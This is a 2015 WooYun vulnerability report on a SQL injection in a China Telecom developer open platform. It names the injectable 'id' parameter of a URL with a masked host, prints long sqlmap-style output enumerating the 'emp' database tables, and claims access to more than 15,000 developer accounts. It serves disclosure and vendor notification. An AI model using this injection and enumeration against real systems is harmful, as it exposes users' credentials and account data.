缺陷编号:WooYun-2015-0125778
漏洞标题:运营商安全之中国电信某开放平台SQL注入漏洞(涉及1.5W+开发者账号详细信息含账号密码\邮箱\账户金额等)
相关厂商:中国电信
漏洞作者:管管侠
提交时间:2015-07-11 21:47
公开时间:2015-08-27 15:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开
有人问我,只看联通、移动?管管你找不到电信的高危漏洞?cncert评运营商的rank总是不高,不够客观。声明:脱库的事我干不出来,不要找我。
http://**.**.**.**/index.php?a=index&c=viewallability&m=api&id=3413id是注入点
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 |
[21:14:46] [INFO] fetching tables for database: 'emp'<br> [21:14:46] [INFO] fetching number of tables for database 'emp'<br> [21:14:46] [INFO] resumed: 1027<br> [21:14:46] [INFO] resumed: emp_ability<br> [21:14:46] [INFO] resumed: emp_ability_api<br> [21:14:46] [INFO] resumed: emp_ability_api_rp<br> [21:14:46] [INFO] resumed: emp_ability_api_statistics<br> [21:14:46] [INFO] resumed: emp_ability_category<br> [21:14:46] [INFO] resumed: emp_ability_collection<br> [21:14:46] [INFO] resumed: emp_ability_dev<br> [21:14:46] [INFO] resumed: emp_ability_new<br> [21:14:46] [INFO] resumed: emp_ability_rp<br> [21:14:46] [INFO] resumed: emp_ability_sendchannel_change_log<br> [21:14:46] [INFO] resumed: emp_ability_sync_temp<br> [21:14:46] [INFO] resumed: emp_ability_sync_temp_log<br> [21:14:46] [INFO] resumed: emp_ability_tag<br> [21:14:46] [INFO] resumed: emp_ability_unifyability<br> [21:14:46] [INFO] resumed: emp_ability_version<br> [21:14:46] [INFO] resumed: emp_access_ip<br> [21:14:46] [INFO] resumed: emp_access_token<br> [21:14:46] [INFO] resumed: emp_account_info_request<br> [21:14:46] [INFO] resumed: emp_agreement<br> [21:14:46] [INFO] resumed: emp_agreement_contract<br> [21:14:46] [INFO] resumed: emp_api<br> [21:14:46] [INFO] resumed: emp_api_access_history<br> [21:14:46] [INFO] resumed: emp_api_admin_edit_log<br> [21:14:46] [INFO] resumed: emp_api_param<br> [21:14:46] [INFO] resumed: emp_api_rp<br> [21:14:46] [INFO] resumed: emp_api_statistics<br> [21:14:46] [INFO] resumed: emp_api_test_config<br> [21:14:46] [INFO] resumed: emp_api_vote<br> [21:14:46] [INFO] resumed: emp_app_ability<br> [21:14:46] [INFO] resumed: emp_app_ability_contract_sync_logger<br> [21:14:46] [INFO] resumed: emp_app_ability_contract_sync_temp<br> [21:14:46] [INFO] resumed: emp_app_ability_rp<br> [21:14:46] [INFO] resumed: emp_app_accounting_agreement<br> [21:14:46] [INFO] resumed: emp_app_api_call_log<br> [21:14:46] [INFO] resumed: emp_app_api_success_call<br> [21:14:46] [INFO] resumed: emp_app_at_sync_temp<br> [21:14:46] [INFO] resumed: emp_app_billing_black_list<br> [21:14:46] [INFO] resumed: emp_app_billing_cdma_code<br> [21:14:46] [INFO] resumed: emp_app_billing_month_accounting<br> [21:14:46] [INFO] resumed: emp_app_channel<br> [21:14:46] [INFO] resumed: emp_app_device_sync_temp<br> [21:14:46] [INFO] resumed: emp_app_device_sync_temp_logger<br> [21:14:46] [INFO] resumed: emp_app_ep_op_history<br> [21:14:46] [INFO] resumed: emp_app_ep_op_reason_history<br> [21:14:46] [INFO] resumed: emp_app_hot<br> [21:14:46] [INFO] resumed: emp_app_ims_url<br> [21:14:46] [INFO] resumed: emp_app_info<br> [21:14:46] [INFO] resumed: emp_app_info_history<br> [21:14:46] [INFO] resumed: emp_app_info_rp<br> [21:14:46] [INFO] resumed: emp_app_info_sync_logger<br> [21:14:46] [INFO] resumed: emp_app_info_sync_temp<br> [21:14:46] [INFO] resumed: emp_app_message_sync_logger<br> [21:14:46] [INFO] resumed: emp_app_message_sync_temp<br> [21:14:46] [INFO] resumed: emp_app_phone_white_list<br> [21:14:46] [INFO] resumed: emp_app_sdk<br> [21:14:46] [INFO] resumed: emp_app_sms_spread_code<br> [21:14:46] [INFO] resumed: emp_app_spread<br> [21:14:46] [INFO] resumed: emp_app_struct_tags<br> [21:14:46] [INFO] resumed: emp_app_tags<br> [21:14:46] [INFO] resumed: emp_app_testing_audit<br> [21:14:46] [INFO] resumed: emp_app_version<br> [21:14:46] [INFO] resumed: emp_app_white_list<br> [21:14:46] [INFO] resumed: emp_attachament_ref<br> [21:14:46] [INFO] resumed: emp_authorization_code<br> [21:14:46] [INFO] resumed: emp_authorization_remove_log<br> [21:14:46] [INFO] resumed: emp_authorization_sync_logger<br> [21:14:46] [INFO] resumed: emp_authorization_sync_temp<br> [21:14:46] [INFO] resumed: emp_authorize_request<br> [21:14:46] [INFO] resumed: emp_authorize_traffic<br> [21:14:46] [INFO] resumed: emp_bestpay_order<br> [21:14:46] [INFO] resumed: emp_billing<br> [21:14:46] [INFO] resumed: emp_billing_app_white_list<br> [21:14:46] [INFO] resumed: emp_billing_limit<br> [21:14:46] [INFO] resumed: emp_billing_order_relation<br> [21:14:46] [INFO] resumed: emp_billing_order_relation_log<br> [21:14:46] [INFO] resumed: emp_billing_phone_limit<br> [21:14:46] [INFO] resumed: emp_billing_price_auth<br> [21:14:46] [INFO] resumed: emp_billing_price_config<br> [21:14:46] [INFO] resumed: emp_billing_push<br> [21:14:46] [INFO] resumed: emp_billing_push_log<br> [21:14:46] [INFO] resumed: emp_billing_sms_received_notify<br> [21:14:46] [INFO] resumed: emp_billing_sms_result<br> [21:14:46] [INFO] resumed: emp_billing_sms_sending<br> [21:14:46] [INFO] resumed: emp_billing_token<br> [21:14:46] [INFO] resumed: emp_cancel_authorization_sync_logger<br> [21:14:46] [INFO] resumed: emp_cancel_authorization_sync_temp<br> [21:14:46] [INFO] resumed: emp_cdma_code<br> [21:14:46] [INFO] resumed: emp_cdma_code2<br> [21:14:46] [INFO] resumed: emp_cloudycode_from_source<br> [21:14:46] [INFO] resumed: emp_cloudyserver<br> [21:14:46] [INFO] resumed: emp_cloudyserver_history<br> [21:14:46] [INFO] resumed: emp_cloudyserver_recycle<br> [21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data<br> [21:14:46] [INFO] resumed: emp_cloudyserver_request_code_data_back<br> [21:14:46] [INFO] resumed: emp_cms_ability_sdk_api_count<br> [21:14:46] [INFO] resumed: emp_cms_admin<br> [21:14:46] [INFO] resumed: emp_cms_admin_panel<br> [21:14:46] [INFO] resumed: emp_cms_admin_role<br> [21:14:46] [INFO] resumed: emp_cms_admin_role_priv<br> [21:14:46] [INFO] resumed: emp_cms_admin_role_ref<br> [21:14:46] [INFO] resumed: emp_cms_announce<br> [21:14:46] [INFO] resumed: emp_cms_api<br> [21:14:46] [INFO] resumed: emp_cms_api_data<br> [21:14:46] [INFO] resumed: emp_cms_app_recommend<br> [21:14:46] [INFO] resumed: emp_cms_attachment<br> [21:14:46] [INFO] resumed: emp_cms_attachment_index<br> [21:14:46] [INFO] resumed: emp_cms_audit_msg_fav<br> [21:14:46] [INFO] resumed: emp_cms_badword<br> [21:14:46] [INFO] resumed: emp_cms_cache<br> [21:14:46] [INFO] resumed: emp_cms_category<br> [21:14:46] [INFO] resumed: emp_cms_category_priv<br> [21:14:46] [INFO] resumed: emp_cms_cloud_testing_appadd<br> [21:14:46] [INFO] resumed: emp_cms_cloud_testing_dispatchlist<br> [21:14:46] [INFO] resumed: emp_cms_cloud_testing_modelgetspecimens<br> [21:14:46] [INFO] resumed: emp_cms_comment<br> [21:14:46] [INFO] resumed: emp_cms_comment_check<br> [21:14:46] [INFO] resumed: emp_cms_comment_data_1<br> [21:14:46] [INFO] resumed: emp_cms_comment_setting<br> [21:14:46] [INFO] resumed: emp_cms_comment_table<br> [21:14:46] [INFO] resumed: emp_cms_content_check<br> [21:14:46] [INFO] resumed: emp_cms_copyfrom<br> [21:14:46] [INFO] resumed: emp_cms_email<br> [21:14:46] [INFO] resumed: emp_cms_email_queue<br> [21:14:46] [INFO] resumed: emp_cms_email_template<br> [21:14:46] [INFO] resumed: emp_cms_extend_setting<br> [21:14:46] [INFO] resumed: emp_cms_favorite<br> [21:14:46] [INFO] resumed: emp_cms_form_open_sign<br> [21:14:46] [INFO] resumed: emp_cms_hits<br> [21:14:46] [INFO] resumed: emp_cms_invcode<br> [21:14:46] [INFO] resumed: emp_cms_invcode_type<br> [21:14:46] [INFO] resumed: emp_cms_ipbanned<br> [21:14:46] [INFO] resumed: emp_cms_keylink<br> [21:14:46] [INFO] resumed: emp_cms_link<br> [21:14:46] [INFO] resumed: emp_cms_linkage<br> [21:14:46] [INFO] resumed: emp_cms_log<br> [21:14:46] [INFO] resumed: emp_cms_member<br> [21:14:46] [INFO] resumed: emp_cms_member_company<br> [21:14:46] [INFO] resumed: emp_cms_member_detail<br> [21:14:46] [INFO] resumed: emp_cms_member_enabler<br> [21:14:46] [INFO] resumed: emp_cms_member_enabler_rp<br> [21:14:46] [INFO] resumed: emp_cms_member_free_times<br> [21:14:46] [INFO] resumed: emp_cms_member_group<br> [21:14:46] [INFO] resumed: emp_cms_member_hand_package<br> [21:14:46] [INFO] resumed: emp_cms_member_hand_package_data<br> [21:14:46] [INFO] resumed: emp_cms_member_hand_package_log<br> [21:14:46] [INFO] resumed: emp_cms_member_invite<br> [21:14:46] [INFO] resumed: emp_cms_member_menu<br> [21:14:46] [INFO] resumed: emp_cms_member_package<br> [21:14:46] [INFO] resumed: emp_cms_member_package_sync_logger<br> [21:14:46] [INFO] resumed: emp_cms_member_package_sync_temp<br> [21:14:46] [INFO] resumed: emp_cms_member_send_mark<br> [21:14:46] [INFO] resumed: emp_cms_member_verify<br> [21:14:46] [INFO] resumed: emp_cms_member_vip<br> [21:14:46] [INFO] resumed: emp_cms_menu<br> [21:14:46] [INFO] resumed: emp_cms_message<br> [21:14:46] [INFO] resumed: emp_cms_message_category<br> [21:14:46] [INFO] resumed: emp_cms_message_conversation<br> [21:14:46] [INFO] resumed: emp_cms_message_data<br> [21:14:46] [INFO] resumed: emp_cms_message_group<br> [21:14:46] [INFO] resumed: emp_cms_model<br> [21:14:46] [INFO] resumed: emp_cms_model_field<br> [21:14:46] [INFO] resumed: emp_cms_module<br> [21:14:46] [INFO] resumed: emp_cms_news<br> [21:14:46] [INFO] resumed: emp_cms_news_data<br> [21:14:46] [INFO] resumed: emp_cms_open<br> [21:14:46] [INFO] resumed: emp_cms_open_data<br> [21:14:46] [INFO] resumed: emp_cms_open_star<br> [21:14:46] [INFO] resumed: emp_cms_package_order_change_log<br> [21:14:46] [INFO] resumed: emp_cms_page<br> [21:14:46] [INFO] resumed: emp_cms_page_log<br> [21:14:46] [INFO] resumed: emp_cms_pay_account<br> [21:14:46] [INFO] resumed: emp_cms_pay_coupon<br> [21:14:46] [INFO] resumed: emp_cms_pay_coupon_code<br> [21:14:46] [INFO] resumed: emp_cms_pay_package<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_invoice<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_dedicated<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_sender_info<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_invoice_tmp<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_order<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_order_data<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_sync_logger<br> [21:14:46] [INFO] resumed: emp_cms_pay_package_sync_temp<br> [21:14:46] [INFO] resumed: emp_cms_pay_payment<br> [21:14:46] [INFO] resumed: emp_cms_pay_spend<br> [21:14:46] [INFO] resumed: emp_cms_plugin<br> [21:14:46] [INFO] resumed: emp_cms_plugin_var<br> [21:14:46] [INFO] resumed: emp_cms_position<br> [21:14:46] [INFO] resumed: emp_cms_position_data<br> [21:14:46] [INFO] resumed: emp_cms_poster<br> [21:14:46] [INFO] resumed: emp_cms_poster_201506<br> [21:14:46] [INFO] resumed: emp_cms_poster_201507<br> [21:14:46] [INFO] resumed: emp_cms_poster_space<br> [21:14:46] [INFO] resumed: emp_cms_print_invoice_sender_log<br> [21:14:46] [INFO] resumed: emp_cms_queue<br> [21:14:46] [INFO] resumed: emp_cms_release_point<br> [21:14:46] [INFO] resumed: emp_cms_search<br> [21:14:46] [INFO] resumed: emp_cms_search_keyword<br> [21:14:46] [INFO] resumed: emp_cms_session<br> [21:14:46] [INFO] resumed: emp_cms_site<br> [21:14:46] [INFO] resumed: emp_cms_sms_report<br> [21:14:46] [INFO] resumed: emp_cms_sphinx_counter<br> [21:14:46] [INFO] resumed: emp_cms_suggestion<br> [21:14:46] [INFO] resumed: emp_cms_template_bak<br> [21:14:46] [INFO] resumed: emp_cms_times<br> [21:14:46] [INFO] resumed: emp_cms_type<br> [21:14:46] [INFO] resumed: emp_cms_urlrule<br> [21:14:46] [INFO] resumed: emp_cms_workflow<br> [21:14:46] [INFO] resumed: emp_contract_info<br> [21:14:46] [INFO] resumed: emp_contract_info_in_template<br> [21:14:46] [INFO] resumed: emp_d_20130724<br> [21:14:46] [INFO] resumed: emp_d_20130725<br> [21:14:46] [INFO] resumed: emp_d_20130726<br> [21:14:46] [INFO] resumed: emp_d_20130727<br> [21:14:46] [INFO] resumed: emp_d_20130728<br> [21:14:46] [INFO] resumed: emp_d_20130729<br> [21:14:46] [INFO] resumed: emp_d_20130730<br> [21:14:46] [INFO] resumed: emp_d_20130731<br> [21:14:46] [INFO] resumed: emp_d_20130801<br> [21:14:46] [INFO] resumed: emp_d_20130802<br> [21:14:46] [INFO] resumed: emp_d_20130803<br> [21:14:46] [INFO] resumed: emp_d_20130804<br> [21:14:46] [INFO] resumed: emp_d_20130805<br> [21:14:46] [INFO] resumed: emp_d_20130806<br> [21:14:46] [INFO] resumed: emp_d_20130807<br> [21:14:46] [INFO] resumed: emp_d_20130808<br> [21:14:46] [INFO] resumed: emp_d_20130809<br> [21:14:46] [INFO] resumed: emp_d_20130810<br> [21:14:46] [INFO] resumed: emp_d_20130811<br> [21:14:46] [INFO] resumed: emp_d_20130812<br> [21:14:46] [INFO] resumed: emp_d_20130813<br> [21:14:46] [INFO] resumed: emp_d_20130814<br> [21:14:46] [INFO] resumed: emp_d_20130815<br> [21:14:46] [INFO] resumed: emp_d_20130816<br> [21:14:46] [INFO] resumed: emp_d_20130817<br> [21:14:46] [INFO] resumed: emp_d_20130818<br> [21:14:46] [INFO] resumed: emp_d_20130819<br> [21:14:46] [INFO] resumed: emp_d_20130820<br> [21:14:46] [INFO] resumed: emp_d_20130821<br> [21:14:46] [INFO] resumed: emp_d_20130822<br> [21:14:46] [INFO] resumed: emp_d_20130823<br> [21:14:46] [INFO] resumed: emp_d_20130824<br> [21:14:46] [INFO] resumed: emp_d_20130825<br> [21:14:46] [INFO] resumed: emp_d_20130826<br> [21:14:46] [INFO] resumed: emp_d_20130827<br> [21:14:46] [INFO] resumed: emp_d_20130828<br> [21:14:46] [INFO] resumed: emp_d_20130829<br> [21:14:46] [INFO] resumed: emp_d_20130830<br> [21:14:46] [INFO] resumed: emp_d_20130831<br> [21:14:46] [INFO] resumed: emp_d_20130901<br> [21:14:46] [INFO] resumed: emp_d_20130902<br> [21:14:46] [INFO] resumed: emp_d_20130903<br> [21:14:46] [INFO] resumed: emp_d_20130904<br> [21:14:46] [INFO] resumed: emp_d_20130905<br> [21:14:46] [INFO] resumed: emp_d_20130906<br> [21:14:46] [INFO] resumed: emp_d_20130907<br> [21:14:46] [INFO] resumed: emp_d_20130908<br> [21:14:46] [INFO] resumed: emp_d_20130909<br> [21:14:46] [INFO] resumed: emp_d_20130910<br> [21:14:46] [INFO] resumed: emp_d_20130911<br> [21:14:46] [INFO] resumed: emp_d_20130912<br> [21:14:46] [INFO] resumed: emp_d_20130913<br> [21:14:46] [INFO] resumed: emp_d_20130914<br> [21:14:46] [INFO] resumed: emp_d_20130915<br> [21:14:46] [INFO] resumed: emp_d_20130916<br> [21:14:46] [INFO] resumed: emp_d_20130917<br> [21:14:46] [INFO] resumed: emp_d_20130918<br> [21:14:46] [INFO] resumed: emp_d_20130919<br> ....... |
表太多,读不完,算了,找到了表:emp_cms_member
涉及万款左右的应用,危害还是蛮大的
再次声明:这1.5w+的开发者数据仅读取了4条作危害证明
危害等级:高
漏洞Rank:10
确认时间:2015-07-1315:02
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
暂无
厉害!前排
厉害!前排
phpcms那个open吧。。。不是更新了么?
师傅
原文连接
的情况下转载,若非则不得使用我方内容。